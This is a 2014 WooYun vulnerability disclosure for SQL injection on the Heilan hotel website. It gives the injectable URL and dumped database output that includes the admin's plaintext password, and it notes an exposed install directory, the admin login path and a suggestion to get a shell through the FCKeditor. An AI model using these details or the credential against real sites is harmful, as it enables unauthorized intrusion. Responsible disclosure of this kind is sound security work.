当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048882

漏洞标题:海澜酒店sql注入明文密码至后台

相关厂商:heilanhome.com

漏洞作者: 小胖子

提交时间:2014-01-14 16:26

修复时间:2014-02-28 16:27

公开时间:2014-02-28 16:27

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-14: 细节已通知厂商并且等待厂商处理中
2014-01-14: 厂商已经确认,细节仅向厂商公开
2014-01-24: 细节向核心白帽子及相关领域专家公开
2014-02-03: 细节向普通白帽子公开
2014-02-13: 细节向实习白帽子公开
2014-02-28: 细节向公众公开

简要描述:

刷刷WB。

详细说明:

分站:海澜集团-海澜酒店http://hotel.heilan.com.cn/
注入点:http://hotel.heilan.com.cn/archives/detail.php?id=ylxx

.png


三个数据库!

available databases [3]:
[*] hailanhotel
[*] information_schema
[*] test


当前数据库的表:

Database: hailanhotel
[6 tables]
+--------------------+
| hotel_cn_archives |
| hotel_cn_links |
| hotel_cn_message |
| hotel_cn_news |
| hotel_cn_news_type |
| hotel_cn_user |
+--------------------+


管理员:

Database: hailanhotel
Table: hotel_cn_user
[1 entry]
+-------------+-----------+
| password | user_name |
+-------------+-----------+
| heilan_3561 | admin |
+-------------+-----------+


有重装漏洞:
http://hotel.heilan.com.cn/install/
这个得到后台地址;
http://hotel.heilan.com.cn/ogilvy_sys/login.php#
然后登陆后台,fck编辑器可以拿shell呀~

.png


漏洞证明:

分站:海澜集团-海澜酒店http://hotel.heilan.com.cn/
注入点:http://hotel.heilan.com.cn/archives/detail.php?id=ylxx

.png


三个数据库!

available databases [3]:
[*] hailanhotel
[*] information_schema
[*] test


当前数据库的表:

Database: hailanhotel
[6 tables]
+--------------------+
| hotel_cn_archives |
| hotel_cn_links |
| hotel_cn_message |
| hotel_cn_news |
| hotel_cn_news_type |
| hotel_cn_user |
+--------------------+


管理员:

Database: hailanhotel
Table: hotel_cn_user
[1 entry]
+-------------+-----------+
| password | user_name |
+-------------+-----------+
| heilan_3561 | admin |
+-------------+-----------+


有重装漏洞:
http://hotel.heilan.com.cn/install/
这个得到后台地址;
http://hotel.heilan.com.cn/ogilvy_sys/login.php#
然后登陆后台,fck编辑器可以拿shell呀~

.png


修复方案:

0x1:修复注入。
0x2:修复重装漏洞,安装好了删除安装目录。
0x3:求高rank!

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-01-14 16:57

厂商回复:

多谢反馈,问题尽快着手处理

最新状态:

暂无


漏洞评价:

评论

  1. 2014-01-14 16:27 | BadCat ( 实习白帽子 | Rank:81 漏洞数:21 | 悲剧的我什么都不会)

    明文......

  2. 2014-01-14 16:37 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    胖子经常去开房啊!

  3. 2014-01-14 16:47 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    @小胖子 加个qq1816475900搞个基友